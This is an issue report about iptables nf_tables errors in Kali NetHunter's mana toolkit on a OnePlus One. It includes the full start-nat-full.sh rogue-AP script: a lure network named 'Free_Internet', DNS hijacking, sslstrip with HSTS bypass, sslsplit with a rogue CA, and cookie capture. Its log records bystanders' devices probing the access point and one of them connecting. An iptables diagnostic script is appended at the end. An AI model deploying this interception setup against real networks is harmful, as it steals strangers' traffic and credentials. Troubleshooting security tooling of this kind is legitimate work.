Mana toolkit ip tables error
Important: Before opening an issue, did you check on the NetHunter Forum to see if this has already been discussed on it?
Link is: https://forums.kali.org/forumdisplay.php?14-NetHunter-Forums
Device: OnePlus One
OS version (KitKat/Lollipop/Marshmallow/Nougat): Marshmallow 6.01, CM13, Kali NetHunter built from the build script
Built from repo (date and build command) or downloaded from website (links): both; built with nethunter-fs and downloaded from the site
Issue:
Almost everything works, but iptables gives an error, something with 1.8; I post a screen about it. Because of that, if another device connects, its wifi icon has a "!" mark.
Expected behavior:
That I can use start-nat-full without any problems.
Any idea on where to look at?
I guess the iptables.
Screenshots (Optional)
**This is my dhcp.conf:**
```
# dhcpd.conf
#
# Sample configuration file for ISC dhcpd
#

# option definitions common to all supported networks...
option domain-name "example.org";
option domain-name-servers ns1.example.org, ns2.example.org;

default-lease-time 600;
max-lease-time 7200;

# The ddns-updates-style parameter controls whether or not the server will
# attempt to do a DNS update when a lease is confirmed. We default to the
# behavior of the version 2 packages ('none', since DHCP v2 didn't
# have support for DDNS.)
ddns-update-style none;

# If this DHCP server is the official DHCP server for the local
# network, the authoritative directive should be uncommented.
#authoritative;

# Use this to send dhcp log messages to a different log file (you also
# have to hack syslog.conf to complete the redirection).
#log-facility local7;

# No service will be given on this subnet, but declaring it helps the
# DHCP server to understand the network topology.
#subnet 10.152.187.0 netmask 255.255.255.0 {
#}

# This is a very basic subnet declaration.
#subnet 10.254.239.0 netmask 255.255.255.224 {
#  range 10.254.239.10 10.254.239.20;
#  option routers rtr-239-0-1.example.org, rtr-239-0-2.example.org;
#}

# This declaration allows BOOTP clients to get dynamic addresses,
# which we don't really recommend.
#subnet 10.254.239.32 netmask 255.255.255.224 {
#  range dynamic-bootp 10.254.239.40 10.254.239.60;
#  option broadcast-address 10.254.239.31;
#  option routers rtr-239-32-1.example.org;
#}

# A slightly different configuration for an internal subnet.
#subnet 10.5.5.0 netmask 255.255.255.224 {
#  range 10.5.5.26 10.5.5.30;
#  option domain-name-servers ns1.internal.example.org;
#  option domain-name "internal.example.org";
#  option routers 10.5.5.1;
#  option broadcast-address 10.5.5.31;
#  default-lease-time 600;
#  max-lease-time 7200;
#}

# Hosts which require special configuration options can be listed in
# host statements. If no address is specified, the address will be
# allocated dynamically (if possible), but the host-specific information
# will still come from the host declaration.
#host passacaglia {
#  hardware ethernet 0:0:c0:5d:bd:95;
#  filename "vmunix.passacaglia";
#  server-name "toccata.example.com";
#}

# Fixed IP addresses can also be specified for hosts. These addresses
# should not also be listed as being available for dynamic assignment.
# Hosts for which fixed IP addresses have been specified can boot using
# BOOTP or DHCP. Hosts for which no fixed address is specified can only
# be booted with DHCP, unless there is an address range on the subnet
# to which a BOOTP client is connected which has the dynamic-bootp flag
# set.
#host fantasia {
#  hardware ethernet 08:00:07:26:c0:a5;
#  fixed-address fantasia.example.com;
#}

# You can declare a class of clients and then do address allocation
# based on that. The example below shows a case where all clients
# in a certain class get addresses on the 10.17.224/24 subnet, and all
# other clients get addresses on the 10.0.29/24 subnet.
#class "foo" {
#  match if substring (option vendor-class-identifier, 0, 4) = "SUNW";
#}

#shared-network 224-29 {
#  subnet 10.17.224.0 netmask 255.255.255.0 {
#    option routers rtr-224.example.org;
#  }
#  subnet 10.0.29.0 netmask 255.255.255.0 {
#    option routers rtr-29.example.org;
#  }
#  pool {
#    allow members of "foo";
#    range 10.17.224.10 10.17.224.250;
#  }
#  pool {
#    deny members of "foo";
#    range 10.0.29.10 10.0.29.230;
#  }
#}
```
**This is my start-nat-full.sh:**
```bash
#!/bin/bash
upstream=wlan0
phy=wlan1
conf=/sdcard/nh_files/configs/hostapd-karma.conf
hostapd=/usr/lib/mana-toolkit/hostapd

echo '1' > /proc/sys/net/ipv4/ip_forward
rfkill unblock wlan

echo -- $phy: flushing interface --
ip addr flush dev $phy
echo -- $phy: setting ip --
ip addr add 10.0.0.1/24 dev $phy
echo -- $phy: starting the interface --
ip link set $phy up
echo -- $phy: setting route --
ip route add default via 10.0.0.1 dev $phy

# Starting AP and DHCP
sed -i "s/^interface=.*$/interface=$phy/" $conf
$hostapd $conf &
sleep 5
dnsmasq -z -C /etc/mana-toolkit/dnsmasq-dhcpd.conf -i $phy -I lo
#dnsmasq -z -C /etc/mana-toolkit/dnsmasq-dhcpd.conf -i $phy -I lo
sleep 5

# Add fking rule to table 1006
# Find the routing table that carries the default route via the upstream interface
for table in $(ip rule list | awk -F"lookup" '{print $2}');
do
	DEF=`ip route show table $table|grep default|grep $upstream`
	if ! [ -z "$DEF" ]; then
		break
	fi
done
ip route add 10.0.0.0/24 dev $phy scope link table $table

# RM quota from chains to avoid errors in iptable-save
# http://lists.netfilter.org/pipermail/netfilter-buglog/2013-October/002995.html
iptables -F bw_INPUT
iptables -F bw_OUTPUT

# Save
iptables-save > /tmp/rules.txt

# Flush
iptables --policy INPUT ACCEPT
iptables --policy FORWARD ACCEPT
iptables --policy OUTPUT ACCEPT
iptables -F
iptables -F -t nat

# Masquerade
iptables -t nat -A POSTROUTING -o $upstream -j MASQUERADE
iptables -A FORWARD -i $phy -o $upstream -j ACCEPT
iptables -t nat -A PREROUTING -i $phy -p udp --dport 53 -j DNAT --to 10.0.0.1

# SSLStrip with HSTS bypass
cd /usr/share/mana-toolkit/sslstrip-hsts/sslstrip2/
python sslstrip.py -l 10000 -a -w /var/lib/mana-toolkit/sslstrip.log&
iptables -t nat -A PREROUTING -i $phy -p tcp --destination-port 80 -j REDIRECT --to-port 10000
cd /usr/share/mana-toolkit/sslstrip-hsts/dns2proxy/
python dns2proxy.py -i $phy&
cd -

# SSLSplit
sslsplit -D -P -Z -S /var/lib/mana-toolkit/sslsplit -c /usr/share/mana-toolkit/cert/rogue-ca.pem -k /usr/share/mana-toolkit/cert/rogue-ca.key -O -l /var/lib/mana-toolkit/sslsplit-connect.log \
	https 0.0.0.0 10443 \
	http 0.0.0.0 10080 \
	ssl 0.0.0.0 10993 \
	tcp 0.0.0.0 10143 \
	ssl 0.0.0.0 10995 \
	tcp 0.0.0.0 10110 \
	ssl 0.0.0.0 10465 \
	tcp 0.0.0.0 10025&
# The REDIRECT target is only valid in the PREROUTING and OUTPUT chains, and
# port 80 is already redirected to sslstrip above, so this rule is disabled.
#iptables -t nat -A INPUT -i $phy -p tcp --destination-port 80 -j REDIRECT --to-port 10080
iptables -t nat -A PREROUTING -i $phy -p tcp --destination-port 443 -j REDIRECT --to-port 10443
iptables -t nat -A PREROUTING -i $phy -p tcp --destination-port 143 -j REDIRECT --to-port 10143
iptables -t nat -A PREROUTING -i $phy -p tcp --destination-port 993 -j REDIRECT --to-port 10993
iptables -t nat -A PREROUTING -i $phy -p tcp --destination-port 65493 -j REDIRECT --to-port 10993
iptables -t nat -A PREROUTING -i $phy -p tcp --destination-port 465 -j REDIRECT --to-port 10465
iptables -t nat -A PREROUTING -i $phy -p tcp --destination-port 25 -j REDIRECT --to-port 10025
iptables -t nat -A PREROUTING -i $phy -p tcp --destination-port 995 -j REDIRECT --to-port 10995
iptables -t nat -A PREROUTING -i $phy -p tcp --destination-port 110 -j REDIRECT --to-port 10110

# Start FireLamb
/usr/share/mana-toolkit/firelamb/firelamb.py -i $phy &
sleep 5

echo "Hit enter to kill me"
read
pkill dhcpd
pkill sslstrip
pkill sslsplit
pkill hostapd
pkill python

# Restore
# iptables-restore < /tmp/rules.txt
# rm /tmp/rules.txt

# Remove iface and routes
ip addr flush dev $phy
ip link set $phy down
```
**And this is the error:**
```
-- wlan1: flushing interface --
-- wlan1: setting ip --
-- wlan1: starting the interface --
-- wlan1: setting route --
Configuration file: /sdcard/nh_files/configs/hostapd-karma.conf
Using interface wlan1 with hwaddr 00:11:22:33:44:00 and ssid "Free_Internet"
wlan1: interface state UNINITIALIZED->ENABLED
wlan1: AP-ENABLED
MANA - Directed probe request for foreign SSID 'FRITZ!Box 5490 OL' from 3c:22:fb:d5:91:f2
MANA - Directed probe request for foreign SSID 'FRITZ!Box 5490 OL' from 3c:22:fb:d5:91:f2
MANA - Directed probe request for foreign SSID 'FRITZ!Box 5490 OL' from 3c:22:fb:d5:91:f2
iptables v1.8.7 (nf_tables): Could not fetch rule set generation id: Invalid argument
iptables v1.8.7 (nf_tables): Could not fetch rule set generation id: Invalid argument
iptables v1.8.7 (nf_tables): Could not fetch rule set generation id: Invalid argument
iptables v1.8.7 (nf_tables): Could not fetch rule set generation id: Invalid argument
iptables v1.8.7 (nf_tables): Could not fetch rule set generation id: Invalid argument
iptables v1.8.7 (nf_tables): Could not fetch rule set generation id: Invalid argument
iptables v1.8.7 (nf_tables): Could not fetch rule set generation id: Invalid argument
iptables v1.8.7 (nf_tables): Could not fetch rule set generation id: Invalid argument
iptables v1.8.7 (nf_tables): Could not fetch rule set generation id: Invalid argument
iptables v1.8.7 (nf_tables): unknown option "--dport"
Try `iptables -h' or 'iptables --help' for more information.
iptables v1.8.7 (nf_tables): unknown option "--destination-port"
Try `iptables -h' or 'iptables --help' for more information.
/usr/share/mana-toolkit/sslstrip-hsts/sslstrip2
Traceback (most recent call last):
  File "sslstrip.py", line 27, in <module>
    from twisted.web import http
ImportError: No module named twisted.web
| Warning: -F requires a privileged operation for each
| connection! Privileged operations require communication
| between parent and child process and will negatively
| impact latency and performance on each connection.
SSLsplit 0.5.5 (built 2019-11-13)
Copyright (c) 2009-2019, Daniel Roethlisberger <daniel@roe.ch>
https://www.roe.ch/SSLsplit
Build info: V:FILE HDIFF:0 N:83c4edf
Features: -DHAVE_NETFILTER
NAT engines: netfilter* tproxy
netfilter: IP_TRANSPARENT IP6T_SO_ORIGINAL_DST
Local process info support: no
compiled against OpenSSL 1.1.1d 10 Sep 2019 (1010104f)
rtlinked against OpenSSL 1.1.1j 16 Feb 2021 (101010af)
OpenSSL has support for TLS extensions
TLS Server Name Indication (SNI) supported
OpenSSL is thread-safe with THREADID
OpenSSL has engine support
Using SSL_MODE_RELEASE_BUFFERS
SSL/TLS protocol availability: tls10 tls11 tls12
SSL/TLS algorithm availability: !SHA0 RSA DSA ECDSA DH ECDH EC
OpenSSL option availability: SSL_OP_NO_COMPRESSION SSL_OP_NO_TICKET SSL_OP_ALLOW_UNSAFE_LEGACY_RENEGOTIATION SSL_OP_DONT_INSERT_EMPTY_FRAGMENTS SSL_OP_NO_SESSION_RESUMPTION_ON_RENEGOTIATION SSL_OP_TLS_ROLLBACK_BUG
compiled against libevent 2.1.11-stable
rtlinked against libevent 2.1.12-stable
compiled against libnet 1.1.6
rtlinked against libnet 1.1.6
compiled against libpcap n/a
rtlinked against libpcap 1.10.0 (with TPACKET_V3)
4 CPU cores detected
Traceback (most recent call last):
  File "dns2proxy.py", line 21, in <module>
    import dns.message
ImportError: No module named dns.message
iptables v1.8.7 (nf_tables): unknown option "--destination-port"
Try `iptables -h' or 'iptables --help' for more information.
iptables v1.8.7 (nf_tables): unknown option "--destination-port"
Try `iptables -h' or 'iptables --help' for more information.
iptables v1.8.7 (nf_tables): unknown option "--destination-port"
Try `iptables -h' or 'iptables --help' for more information.
iptables v1.8.7 (nf_tables): unknown option "--destination-port"
Try `iptables -h' or 'iptables --help' for more information.
iptables v1.8.7 (nf_tables): unknown option "--destination-port"
Try `iptables -h' or 'iptables --help' for more information.
iptables v1.8.7 (nf_tables): unknown option "--destination-port"
Try `iptables -h' or 'iptables --help' for more information.
iptables v1.8.7 (nf_tables): unknown option "--destination-port"
Try `iptables -h' or 'iptables --help' for more information.
iptables v1.8.7 (nf_tables): unknown option "--destination-port"
Try `iptables -h' or 'iptables --help' for more information.
Traceback (most recent call last):
  File "/usr/share/mana-toolkit/firelamb/firelamb.py", line 7, in <module>
    from scapy.all import *
ImportError: No module named scapy.all
Generated 2048 bit RSA key for leaf certs.
SSL/TLS protocol: negotiate
proxyspecs:
- [0.0.0.0]:10025 tcp netfilter
- [0.0.0.0]:10465 ssl netfilter
- [0.0.0.0]:10110 tcp netfilter
- [0.0.0.0]:10995 ssl netfilter
- [0.0.0.0]:10143 tcp netfilter
- [0.0.0.0]:10993 ssl netfilter
- [0.0.0.0]:10080 tcp|http netfilter
- [0.0.0.0]:10443 ssl|http netfilter
Loaded CA: '/C=ZA/ST=Gauteng/L=Pretoria/O=SensePost/OU=MANA/CN=MANA/emailAddress=research@sensepost.com'
SSL/TLS leaf certificates taken from:
- Generated on the fly
Privsep fastpath disabled
Created self-pipe [r=5,w=6]
Created chld-pipe [r=7,w=8]
Created socketpair 0 [p=9,c=10]
Created socketpair 1 [p=11,c=12]
Created socketpair 2 [p=13,c=14]
Created socketpair 3 [p=15,c=16]
Created socketpair 4 [p=17,c=18]
Created socketpair 5 [p=19,c=20]
Privsep parent pid 10150
Privsep child pid 10191
Using libevent backend 'epoll'
Event base supports: edge yes, O(1) yes, anyfd no
Received privsep req type 03 sz 5 on srvsock 9
Received privsep req type 03 sz 5 on srvsock 9
Received privsep req type 03 sz 5 on srvsock 9
Received privsep req type 03 sz 5 on srvsock 9
Received privsep req type 03 sz 5 on srvsock 9
Received privsep req type 03 sz 5 on srvsock 9
Received privsep req type 03 sz 5 on srvsock 9
Received privsep req type 03 sz 5 on srvsock 9
Dropped privs to user nobody group - chroot -
Received privsep req type 00 sz 1 on srvsock 9
Received privsep req type 00 sz 1 on srvsock 11
Inserted events:
  0xb740cf00 [fd 6] Read Persist Internal
  0xb740d01c [fd 8] Read Persist Internal
  0xb740d39c [fd 9] Read Persist
Received privsep req type 00 sz 1 on srvsock 17
Received privsep req type 00 sz 1 on srvsock 19
  0xb740d404 [fd 11] Read Persist
  0xb740d47c [fd 13] Read Persist
  0xb740e34c [fd 15] Read Persist
  0xb740e3dc [fd 17] Read Persist
  0xb740e46c [fd 19] Read Persist
  0xb740e4fc [fd 21] Read Persist
  0xb740e58c [fd 22] Read Persist
  0xb7406b18 [sig 1] Signal Persist
  0xb7406b90 [sig 2] Signal Persist
  0xb7406938 [sig 3] Signal Persist
  0xb740e8e0 [sig 10] Signal Persist
  0xb740a4d0 [sig 13] Signal Persist
  0xb74068a0 [sig 15] Signal Persist
  0xb740e9d8 [fd -1] Persist Timeout=1615293068.246311
Active events:
Initialized 8 connection handling threads
Started 8 connection handling threads
Starting main event loop.
Hit enter to kill me
MANA - Directed probe request for foreign SSID 'W-LAN USB Hub' from 00:24:44:2d:ed:c5
MANA - Directed probe request for foreign SSID 'W-LAN USB Hub' from 00:24:44:2d:ed:c5
MANA - Directed probe request for foreign SSID 'cap-eindhoven-1' from 58:48:22:f0:58:ca
MANA - Directed probe request for actual/legitimate SSID 'Free_Internet' from 88:83:22:dc:b2:81
MANA - Directed probe request for actual/legitimate SSID 'Free_Internet' from 88:83:22:dc:b2:81
MANA - Directed probe request for actual/legitimate SSID 'Free_Internet' from 88:83:22:dc:b2:81
MANA - Directed probe request for actual/legitimate SSID 'Free_Internet' from 88:83:22:dc:b2:81
MANA - Directed probe request for actual/legitimate SSID 'Free_Internet' from 88:83:22:dc:b2:81
wlan1: STA 88:83:22:dc:b2:81 IEEE 802.11: authenticated
wlan1: STA 88:83:22:dc:b2:81 IEEE 802.11: associated (aid 1)
wlan1: AP-STA-CONNECTED 88:83:22:dc:b2:81
Garbage collecting caches started.
Garbage collecting caches done.
MANA - Directed probe request for foreign SSID 'H369AC1908D' from 3c:a9:f4:18:f2:74
MANA - Directed probe request for foreign SSID 'FRITZ!Box 5490 OL' from 3c:22:fb:d5:91:f2
MANA - Directed probe request for foreign SSID 'FRITZ!Box 5490 OL' from 3c:22:fb:d5:91:f2
MANA - Directed probe request for foreign SSID 'honeypot' from 04:d6:aa:4c:16:fe
Garbage collecting caches started.
Garbage collecting caches done.
MANA - Directed probe request for foreign SSID 'H369AC1908D' from 3c:a9:f4:18:f2:74
MANA - Attempting to generated Broadcast response : H369AC1908D (11) for STA 3c:a9:f4:18:f2:74
MANA - Directed probe request for foreign SSID 'FRITZ!Box 5490 OL' from 3c:22:fb:d5:91:f2
MANA - Directed probe request for foreign SSID 'FRITZ!Box 5490 OL' from 3c:22:fb:d5:91:f2
MANA - Directed probe request for foreign SSID 'FRITZ!Box 5490 OL' from 3c:22:fb:d5:91:f2
MANA - Directed probe request for foreign SSID 'FRITZ!Box 5490 OL' from 3c:22:fb:d5:91:f2
Received signal 15
Main event loop stopped (reason=15).
Child pid 10191 killed by signal 15
wlan1: AP-STA-DISCONNECTED 88:83:22:dc:b2:81
```
I hope you guys can help me out. Thanks.
Edited by bvdx199
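The first error in the log above ("Could not fetch rule set generation id: Invalid argument") is the iptables 1.8 nf_tables backend failing to talk to the kernel; the "unknown option" lines that follow are a consequence, since the tcp/udp match extensions never get loaded. The diagnostic below is an added example, not part of NetHunter or the mana toolkit: it parses the backend out of `iptables --version`, recognises that log line, and, assuming a Debian/Kali userland where `update-alternatives` manages the iptables binaries, names the legacy xtables alternative as the thing to try.

```shell
#!/bin/sh
# Added diagnostic for the backend mismatch seen in the log; not part of
# NetHunter or the mana toolkit. The remedy path assumes a Debian/Kali
# userland with update-alternatives (an assumption, not from the issue).

# Extracts the backend from an `iptables --version` line:
# "iptables v1.8.7 (nf_tables)" -> nf_tables, "iptables v1.8.7 (legacy)" -> legacy.
iptables_backend() {
    printf '%s\n' "$1" | sed -n 's/^iptables v[0-9.]* (\([a-z_]*\)).*$/\1/p'
}

# Succeeds when a log line is the nf_tables backend failing to read the kernel
# rule set; the later "unknown option" errors follow from this first failure.
is_nft_init_failure() {
    case "$1" in
        *"(nf_tables): Could not fetch rule set generation id"*) return 0 ;;
        *) return 1 ;;
    esac
}

# Remedy for a kernel without nf_tables support: point the iptables
# alternative at the legacy xtables binary. Prints nothing for legacy.
suggested_remedy() {
    case "$1" in
        nf_tables) echo "update-alternatives --set iptables /usr/sbin/iptables-legacy" ;;
        legacy)    echo "" ;;
        *)         echo "unknown backend: $1" >&2; return 1 ;;
    esac
}

# Live check, meaningful only on the device as root: listing the nat table is
# the same kind of rule-set read that failed in the log.
check_live() {
    ver=$(iptables --version 2>/dev/null) || { echo "iptables not found"; return 1; }
    backend=$(iptables_backend "$ver")
    if iptables -t nat -S >/dev/null 2>&1; then
        echo "iptables ($backend) can read the rule set"
        return 0
    fi
    echo "iptables ($backend) cannot read the rule set on this kernel"
    remedy=$(suggested_remedy "$backend")
    [ -n "$remedy" ] && echo "try: $remedy"
    return 1
}

# Run the live check only when asked, so the functions can be sourced elsewhere.
case "${1-}" in --live) check_live ;; esac
```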